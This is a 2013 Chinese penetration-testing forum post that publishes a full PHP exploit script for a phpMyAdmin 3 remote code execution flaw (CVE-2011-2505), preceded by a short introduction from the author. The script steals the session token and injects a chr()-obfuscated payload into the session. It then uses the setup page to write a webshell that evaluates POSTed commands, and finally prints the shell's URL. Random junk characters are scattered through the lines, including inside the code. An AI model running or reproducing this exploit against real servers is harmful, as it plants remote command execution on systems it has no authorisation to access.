中国网络渗透测试联盟

标题: phpadmin3 remote code execute php版本exploit [打印本页]
作者: admin    时间: 2013-2-21 09:13
标题: phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
, N9 `3 V. v/ N& [1 S3 g0 L* }# v- ?5 D$ M, _
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。1 x: G7 ~" I' i& {
7 ?8 K( C! y, ]" z
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:: P% D4 f% \0 `4 v4 Z
一是session.auto_start = 1;6 @$ `$ M! G4 `( J9 p( ~
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。0 `% P) G' E7 x
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
1 T" t( f2 Z* L* T. l
& p) _. f- [$ e. q. ?& F在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。0 ^3 h1 w; n* I8 h- p5 Y2 ]5 b

! i' U) Z5 K4 t% j, V2 g2 @6 y8 y于是写了这个php版本的exp,代码如下:
. g5 B1 q" A+ a  }: t) O8 ?( H+ |$ v& r" G$ ]
#!/usr/bin/php: b+ H; }  `+ }$ y- Q' u' b4 n
<?php
+ {0 W& A3 |: ^( X( N  _print_r('
& s* b, }$ V/ R2 x# K+---------------------------------------------------------------------------+
3 h# L1 o* `$ N8 X8 P- Y9 g3 Kpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
0 T# ^' o; D9 W; T5 m+ Uby oldjun(www.oldjun.com)2 v" J, Y& H8 F8 Z6 L7 B
welcome to www.t00ls.net
( p; [+ @3 g5 D6 Smail: oldjun@gmail.com$ c; B% k1 S- e6 V1 @. l
Assigned CVE id: CVE-2011-2505
* }, i" S3 t# f- C0 I& A8 f  ^8 ]+---------------------------------------------------------------------------+
0 T  Q5 ^+ ~1 ~% O& k');" |% _9 y% f" E# a0 R. y
. q5 |# n5 Q0 D
/**
# |+ [' ?; r) X7 S$ E- W0 p& a# Y- h * working when the directory:"config" exists and is writeable.$ E; ]2 f4 U  W4 k
**/
. @4 G: L. q3 s" X  n- F5 ?
" D0 J$ [: |: `7 S" s$ S: oif ($argc < 3) {
2 [" k; Z- }# e* f( [, y) z8 v9 @0 l' d    print_r('
2 \3 ^; a# @2 X! i  Z+---------------------------------------------------------------------------+9 x7 }2 H* M% R* q( T5 N' Z
Usage: php '.$argv[0].' host path) S( ?, i" p2 z( t. f
host:      target server (ip/hostname)
3 X( w$ N+ H7 l8 Xpath:      path to pma3: z5 k7 m9 U, U; i9 R9 R/ ^: K3 I
Example:
* M$ N" \. E- i. b! nphp '.$argv[0].' localhost /pma/5 Z& [/ e* h( ]1 A0 z% x: q
+---------------------------------------------------------------------------+- [, A$ V# K5 ]# M  Y
');- ]. j+ M& S) q% ]3 j
    exit;$ I/ |6 u" d$ C- b/ ~
}* {9 E1 E+ }* l& t# z: N

. u$ D/ Y$ S5 D  D$host = $argv[1];4 j( w' G: {2 ]5 x6 @% b
$path = $argv[2];
! Z  C" _' X+ f  Z. W' G1 ~5 R
: F* S) {) f2 i: L( F' ~: U2 W  P/**1 b4 J0 ^/ T; G6 l1 v
* Try to determine if the directory:"config" exists
% G$ h1 |- B8 ~% V: J) f! _% E/ K**/; n  N' X/ }: C4 A' j$ C
echo "[+] Try to determine if the directory:config exists....\n";: \, I$ i$ p* x! K
$returnstr=php_request('config/');
- q, r, i7 C# V& Nif(strpos($returnstr,'404')){* ?0 v+ }1 U" a
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
  ~% F8 ]* E/ v9 V+ G2 _9 @}1 t8 P. S+ Z/ ^5 q& L+ y! E+ J

$ S. @  p+ \. s# b  _/**& q* u" Y8 W1 e8 C% Q
* Try to get token and sessionid8 N9 F4 b3 y5 B- e8 W% I. l. n
**/
. y8 \& b' u9 F0 I* xecho "[+] Try to get token and sessionid....\n";
, s4 l% @! P/ l- a7 {3 S$result=php_request('index.php');% x5 G2 e& A8 q1 O5 z- f2 E( ]& G
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);/ e, C  i# W6 x2 m+ l( R, z
$token=$resp[3];
& U- d- J4 B% ]! W! }* r$sessionid=$resp[1];
; j8 A& \) h& l: E) Z( xif($token && $sessionid){, ~- p2 f2 b; u
    echo "[+] tokentoken\n";1 K& G7 O8 r0 k& o7 n1 v( Q2 T0 B
    echo "[+] Session IDsessionid\n";" x8 C; K1 F3 E+ @( O* v
}else{7 w! M  E& `! s8 k8 C& ~9 @
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");4 q1 ?7 Q- \" u. Q0 V
}* Q) _0 u8 I) ~, Q
' s% K, S" ], K7 P) i5 j& q
/**5 O9 v% y* H  j. n0 a
* Try to insert shell into session
  v+ C( v! A; s0 e" Q: E**/
/ b3 F' _4 }0 b7 secho "[+] Try to insert shell into session....\n";
& ]+ C  R' }1 `) @php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
5 F7 y( N2 f# _2 q
- O* w& ^4 J9 |, U. B; O/**
3 \% ?( x( f5 F' b( B! x * Try to create webshell
" w% Y1 ]5 n% D; \. Y**/
' M$ b8 P* k% m2 j) Yecho "[+] Try to create webshell....\n";# U  P! y5 d5 e1 ^
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/ ^! F- Z& _: v% I/**
9 k6 k2 B7 O0 u6 J, j% F * Try to check if the webshell was created successfully
' [/ D, _" Q$ H) R0 Q**/
+ f' }1 W9 c+ |8 M, m. w- \; Becho "[+] Try to check if the webshell was created successfully....\n";/ M# r% G! M! u4 N9 `  F5 J& Z$ k# i
$content=php_request('config/config.inc.php');
$ d! `- `3 j, D, W7 P7 @if(strpos($content,'t00ls')){4 u7 F& |3 q  |. \
    echo "[+] Congratulations! Expoilt successfully....\n";& }& p8 V# j# f0 E
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";! G" U& m. n( W* N" K
}else{
  @  `" S& q& E3 b; x( @0 h    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
4 V9 N. Y/ w4 }8 K}" c0 A2 C, {7 [8 C- T+ o/ S9 E

8 j  n( O2 N( V% hfunction php_request($url,$data='',$cookie=''){6 _4 W9 L0 E  ?9 A2 T
    global  $host, $path;7 @! n- g. ~4 X4 c
    * S4 c' h* k: Q& b. Q
    $method=$data?'POST':'GET';
4 f0 i: m% R' r! g    8 B* Y& q8 b7 I+ B. t0 i' H
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";$ b+ G: R. r# J& o( }" n
    $packet .= "Accept: */*\r\n";
! _+ X( ^5 h" A1 c2 k    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";" E! {+ w; A! L& v' m/ Z
    $packet .= "Host: $host\r\n";
5 ]( z2 A' x, X6 z* i1 a) _: [    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";$ L' g" L. S3 v$ _/ C$ ]0 \& e
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
3 ]4 e9 u$ y8 p+ g; G2 t& w! |    $packet .= $cookie?"Cookie: $cookie\r\n":"";
9 O! P! \+ i- A. [0 e7 U    $packet .= "Connection: Close\r\n\r\n";
0 |- \4 g8 a' e- W+ `    $packet .= $data?$data:"";& E3 F# d& c* V: C8 C8 |, o# m

5 z4 T/ R4 b+ w9 Z    $fp = fsockopen(gethostbyname($host), 80);0 w+ b6 |  n! k
    if (!$fp) {1 ^6 R" Z$ Q' R# f& m" @) V9 M
    echo 'No response from '.$host; die;
" p5 w7 X1 r3 k* M& U    }
9 l5 l5 b  ~# p6 y    fputs($fp, $packet);
  x- S  c* h5 r" @8 z
) p7 @! D0 |3 u+ S    $resp = '';, T: y  \. T' s; W$ M+ B

* w1 X$ f5 g  n/ l) J. q: ?    while ($fp && !feof($fp))
& k! L& M, F2 e) S3 X" r        $resp .= fread($fp, 1024);- B% L  R- t/ t5 s6 i# @

* t" X" y& I5 }3 p8 \& ]    return $resp;. ~. P# F  F% ^" t: I: _' c! f
}$ ^* e9 m8 t, y7 U1 e8 I3 s. V
    ; v* ~. r7 @! ?7 g/ u: o) l
?> 9 K4 A$ A) S5 A/ j7 @
.



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2